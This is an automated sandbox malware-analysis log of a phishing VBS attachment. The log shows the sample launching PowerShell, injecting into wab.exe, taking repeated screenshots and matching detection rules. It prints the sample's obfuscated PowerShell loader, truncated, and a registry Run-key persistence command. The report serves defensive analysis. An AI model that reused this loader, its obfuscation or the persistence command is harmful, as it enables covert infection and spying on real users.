Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_194522.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_194622.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_194722.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_194822.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_194922.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_195023.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_195123.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_195223.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_213344.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_213444.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_213544.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_213646.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_213746.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_213846.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_213946.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_214046.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_214146.dat entropy: 7.99894823986 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_214247.dat entropy: 7.99894823986 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_214349.dat entropy: 7.99894823986 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_214449.dat entropy: 7.9990385214 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_214549.dat entropy: 7.99897171138 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_214649.dat entropy: 7.99897171138 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_214749.dat entropy: 7.99897171138 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_214850.dat entropy: 7.99897171138 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_214950.dat entropy: 7.99897171138 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_215052.dat entropy: 7.99897171138 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_215155.dat entropy: 7.99904371845 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_215256.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_215356.dat entropy: 7.99910176685 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_195323.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_215456.dat entropy: 7.99910176685 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_195423.dat entropy: 7.99925034941 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_215559.dat entropy: 7.99910176685 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_195523.dat entropy: 7.99909630829 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_215659.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_195623.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_215759.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_195723.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_215900.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_195823.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_220000.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_195923.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_220102.dat entropy: 7.9989658831 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_200023.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_220202.dat entropy: 7.9989658831 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_200124.dat entropy: 7.99896090625 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_220302.dat entropy: 7.9989658831 Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\Users\user\AppData\Roaming\Screenshots\time_20240502_200224.dat entropy: 7.99896090625 Jump to dropped file

System Summary

barindex
Source: amsi64_6868.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi32_2912.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6868, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2912, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 8097
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 8097
Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 8097 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 8097 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Nedskrivningstidspunkter = 1;$Hotplate='S';$Hotplate+='ubstrin';$Hotplate+='g';Function Andelskapitals($Hentningens){$Stadsgartnerne167=$Hentningens.Length-$Nedskrivningstidspunkter;For($Perifere=6; $Perifere -lt $Stadsgartnerne167; $Perifere+=(7)){$Lungfishes+=$Hentningens.$Hotplate.Invoke( $Perifere, $Nedskrivningstidspunkter);}$Lungfishes;}function Ordonnant($splatcher){& ($Typechecke) ($splatcher);}$Nonlover=Andelskapitals ' Sys.aMG oundo hypopzHast.eiMetacrlP,nktulE,sekuaUdfore/Salva.5F.lked.Sto.mh0Bjerge Slips (C llutWBa aviiout,abnSpearmdBasisaoGustneweuryprs ,nsyn ,elaarNCor ndTDec,nc Ign,r1meadwo0Insali.Rygskk0.ceptr;,eutro CamporWReveiliBetalin Co,pl6 Shyes4Bra in;Tegn,f Fjern,xAmmoni6Ch.ysa4 Ps ud;Chemeh Trichor BefrdvTrilli:degend1Archse2r mmea1Shrimp.Macada0 Smrke)No loc RidderGTreskieUhjt,dc PaasykSkurveoUnp in/Introd2Sulted0H.hcer1 fiks.0Missan0 Ulpko1Elect,0 Uds,i1Her.is Lager.FAntipriSams.er Dunfie VarimfsndrerouninvexBroder/Fleece1Ste ku2Fonot,1Frigin.Oblige0Au ifo ';$Staser112=Andelskapitals 'L.gestUPostkasAlkohoe.nlaidr rero-Ka.ensAGaldesgE.dosaeUnsof ncou.tet Garvn ';$tamari=Andelskapitals ' Wic,ihSkridttFlisebtFlinkepRelaks:Spis k/Cablem/ esews8C.efsa7Drame,. Ubehv1Startl2 Dishi1 March. nrum1 Unbed0Aarlig5G psba.Pr.duk1Opteg 8 Oplys4Periv,/NeoclaUD,tabedOmnifavKas,ageCo.logjRetshanWhatsiiAlvildnO,gaveg CleweecowgirrSkriv,nPensioe Miracs Me.pa.SpinulaBovrupaforsknfDi.ndr ';$Unhesitatively=Andelskapitals ' Julea>Rhizop ';$Typechecke=Andelskapitals 'OrfedeiShyesseBesrgex Fr.tt ';$Boblegummiets142='Flyverdragterne';Ordonnant (Andelskapitals 'Plast.SCancane Sociat Udraa-wa,tebCAtavisoRek.rsnDiskoft Ild,leTransvnGu.deltRelosi Dok,me-Sla,gePOuttroaB.kebitNowtschSam.en indtjTKalibr:Torlek\Titre,HProlepaSmokehnVand.ok Idio nMexicasBek ftv DibensRokkesnTjreple Abstrt ocamasCharla3Myelof4Aargan.Photo t PickaxUlydigt,ormon Swith-GutturVCalo,iaVoltenl Khaf uGa biee A,tim ortjn$McnaugBC.llefo nthrbSksforltoldfoeKommutgObligauThuggemSpaltemsonnibiLappedetinta.t AttessAm.est1Noncoo4 ecidi2Cariam;Capafa ');Ordonnant (Andelskapitals ',ostvsiOmfo.mftiaars Change(Tm erftLakkedeHasenss TuvaltA,vask- Ascenp Tes,uaApriortAcronyhGylden ritonT Minim:Bund l\K.pitaHalvarsa Te.ron G,netkSticklnHol,afs gurnav nvades .redin specieDammust rottesKlassi3Sgneda4 Serie.Fi.klvtRhinanxbreasttMultim)Sp,uci{Ministe Br.dexGrundviNdringt Sprog}Doreth;R.cipr ');$Nonenvious = Andelskapitals 'Mistnke spec,cT,avelhHypo,toNo enc Komple%Ov rheasmdenapCorpsmpskurend Midjeaeuectit EfteraBroade%Ejidos\Ko.roidLitmusePathankTolvaalSh rtealaithrr Umisfa SpisetT ansmi WormroEntwinnconsec. ashiSurinseuJea.sepOccide Vesteu&Nuppe.&extra HankneSkurvoc.ulmothSatayfoStat,s iste$kolle. ';Ordonnant (Andelskapitals 'Matri,$Plovfug,arbgel KleptoRoligebMortada,etteflBienni:Cyanocb ErminamingelaK,rkebsM.skinkRede,iaPigmenpSnilde=vandre( trewcTredv
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Nedskrivningstidspunkter = 1;$Hotplate='S';$Hotplate+='ubstrin';$Hotplate+='g';Function Andelskapitals($Hentningens){$Stadsgartnerne167=$Hentningens.Length-$Nedskrivningstidspunkter;For($Perifere=6; $Perifere -lt $Stadsgartnerne167; $Perifere+=(7)){$Lungfishes+=$Hentningens.$Hotplate.Invoke( $Perifere, $Nedskrivningstidspunkter);}$Lungfishes;}function Ordonnant($splatcher){& ($Typechecke) ($splatcher);}$Nonlover=Andelskapitals ' Sys.aMG oundo hypopzHast.eiMetacrlP,nktulE,sekuaUdfore/Salva.5F.lked.Sto.mh0Bjerge Slips (C llutWBa aviiout,abnSpearmdBasisaoGustneweuryprs ,nsyn ,elaarNCor ndTDec,nc Ign,r1meadwo0Insali.Rygskk0.ceptr;,eutro CamporWReveiliBetalin Co,pl6 Shyes4Bra in;Tegn,f Fjern,xAmmoni6Ch.ysa4 Ps ud;Chemeh Trichor BefrdvTrilli:degend1Archse2r mmea1Shrimp.Macada0 Smrke)No loc RidderGTreskieUhjt,dc PaasykSkurveoUnp in/Introd2Sulted0H.hcer1 fiks.0Missan0 Ulpko1Elect,0 Uds,i1Her.is Lager.FAntipriSams.er Dunfie VarimfsndrerouninvexBroder/Fleece1Ste ku2Fonot,1Frigin.Oblige0Au ifo ';$Staser112=Andelskapitals 'L.gestUPostkasAlkohoe.nlaidr rero-Ka.ensAGaldesgE.dosaeUnsof ncou.tet Garvn ';$tamari=Andelskapitals ' Wic,ihSkridttFlisebtFlinkepRelaks:Spis k/Cablem/ esews8C.efsa7Drame,. Ubehv1Startl2 Dishi1 March. nrum1 Unbed0Aarlig5G psba.Pr.duk1Opteg 8 Oplys4Periv,/NeoclaUD,tabedOmnifavKas,ageCo.logjRetshanWhatsiiAlvildnO,gaveg CleweecowgirrSkriv,nPensioe Miracs Me.pa.SpinulaBovrupaforsknfDi.ndr ';$Unhesitatively=Andelskapitals ' Julea>Rhizop ';$Typechecke=Andelskapitals 'OrfedeiShyesseBesrgex Fr.tt ';$Boblegummiets142='Flyverdragterne';Ordonnant (Andelskapitals 'Plast.SCancane Sociat Udraa-wa,tebCAtavisoRek.rsnDiskoft Ild,leTransvnGu.deltRelosi Dok,me-Sla,gePOuttroaB.kebitNowtschSam.en indtjTKalibr:Torlek\Titre,HProlepaSmokehnVand.ok Idio nMexicasBek ftv DibensRokkesnTjreple Abstrt ocamasCharla3Myelof4Aargan.Photo t PickaxUlydigt,ormon Swith-GutturVCalo,iaVoltenl Khaf uGa biee A,tim ortjn$McnaugBC.llefo nthrbSksforltoldfoeKommutgObligauThuggemSpaltemsonnibiLappedetinta.t AttessAm.est1Noncoo4 ecidi2Cariam;Capafa ');Ordonnant (Andelskapitals ',ostvsiOmfo.mftiaars Change(Tm erftLakkedeHasenss TuvaltA,vask- Ascenp Tes,uaApriortAcronyhGylden ritonT Minim:Bund l\K.pitaHalvarsa Te.ron G,netkSticklnHol,afs gurnav nvades .redin specieDammust rottesKlassi3Sgneda4 Serie.Fi.klvtRhinanxbreasttMultim)Sp,uci{Ministe Br.dexGrundviNdringt Sprog}Doreth;R.cipr ');$Nonenvious = Andelskapitals 'Mistnke spec,cT,avelhHypo,toNo enc Komple%Ov rheasmdenapCorpsmpskurend Midjeaeuectit EfteraBroade%Ejidos\Ko.roidLitmusePathankTolvaalSh rtealaithrr Umisfa SpisetT ansmi WormroEntwinnconsec. ashiSurinseuJea.sepOccide Vesteu&Nuppe.&extra HankneSkurvoc.ulmothSatayfoStat,s iste$kolle. ';Ordonnant (Andelskapitals 'Matri,$Plovfug,arbgel KleptoRoligebMortada,etteflBienni:Cyanocb ErminamingelaK,rkebsM.skinkRede,iaPigmenpSnilde=vandre( trewcTredv Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 13_2_0040DD85
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00401806 NtdllDefWindowProc_W, 13_2_00401806
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_004018C0 NtdllDefWindowProc_W, 13_2_004018C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_004016FD NtdllDefWindowProc_A, 14_2_004016FD
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_004017B7 NtdllDefWindowProc_A, 14_2_004017B7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00402CAC NtdllDefWindowProc_A, 15_2_00402CAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00402D66 NtdllDefWindowProc_A, 15_2_00402D66
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9BAACAD6 1_2_00007FFD9BAACAD6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 1_2_00007FFD9BAADC82 1_2_00007FFD9BAADC82
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_08011010 5_2_08011010
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_080118E0 5_2_080118E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_08010CC8 5_2_08010CC8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0044B040 13_2_0044B040
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0043610D 13_2_0043610D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00447310 13_2_00447310
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0044A490 13_2_0044A490
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0040755A 13_2_0040755A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0043C560 13_2_0043C560
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0044B610 13_2_0044B610
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0044D6C0 13_2_0044D6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_004476F0 13_2_004476F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0044B870 13_2_0044B870
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0044081D 13_2_0044081D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00414957 13_2_00414957
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_004079EE 13_2_004079EE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00407AEB 13_2_00407AEB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0044AA80 13_2_0044AA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00412AA9 13_2_00412AA9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00404B74 13_2_00404B74
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00404B03 13_2_00404B03
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0044BBD8 13_2_0044BBD8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00404BE5 13_2_00404BE5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00404C76 13_2_00404C76
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00415CFE 13_2_00415CFE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00416D72 13_2_00416D72
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00446D30 13_2_00446D30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00446D8B 13_2_00446D8B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00406E8F 13_2_00406E8F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00405038 14_2_00405038
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0041208C 14_2_0041208C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_004050A9 14_2_004050A9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0040511A 14_2_0040511A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0043C13A 14_2_0043C13A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_004051AB 14_2_004051AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00449300 14_2_00449300
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0040D322 14_2_0040D322
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0044A4F0 14_2_0044A4F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0043A5AB 14_2_0043A5AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00413631 14_2_00413631
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00446690 14_2_00446690
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0044A730 14_2_0044A730
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_004398D8 14_2_004398D8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_004498E0 14_2_004498E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0044A886 14_2_0044A886
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0043DA09 14_2_0043DA09
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00438D5E 14_2_00438D5E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00449ED0 14_2_00449ED0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_0041FE83 14_2_0041FE83
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 14_2_00430F54 14_2_00430F54
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_004050C2 15_2_004050C2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_004014AB 15_2_004014AB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00405133 15_2_00405133
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_004051A4 15_2_004051A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00401246 15_2_00401246
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_0040CA46 15_2_0040CA46
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00405235 15_2_00405235
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_004032C8 15_2_004032C8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00401689 15_2_00401689
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00402F60 15_2_00402F60
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 004169A7 appears 87 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 0044DB70 appears 41 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 004165FF appears 35 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00422297 appears 42 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00444B5A appears 37 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00413025 appears 79 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 00416760 appears 69 times
Source: REVISED NEW ORDER 7936-2024.vbs Initial sample: Strings found which are bigger than 50
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Nuchale" /t REG_EXPAND_SZ /d "%Piptadenia% -w 1 $Negerens127=(Get-ItemProperty -Path 'HKCU:\Sortiment\').Anadems;%Piptadenia% ($Negerens127)"
Source: amsi64_6868.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi32_2912.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6868, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 2912, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.rans.phis.troj.spyw.expl.evad.winVBS@23/222@2/3
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z, 13_2_004182CE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 15_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification, 15_2_00410DE1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z, 13_2_00418758
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle, 13_2_00413D4C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 13_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy, 13_2_0040B58D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\deklaration.Sup Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5480:120:WilError_03
Source: C:\Program Files (x86)\Windows Mail\wab.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-WTDTSU
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7532:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ivj52lbz.scn.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\REVISED NEW ORDER 7936-2024.vbs"
Source: C:\Program Files (x86)\Windows Mail\wab.exe System information queried: HandleInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6868
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2912
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: wab.exe, wab.exe, 0000000D.00000002.2479208081.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: wab.exe, wab.exe, 0000000E.00000002.2436128765.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
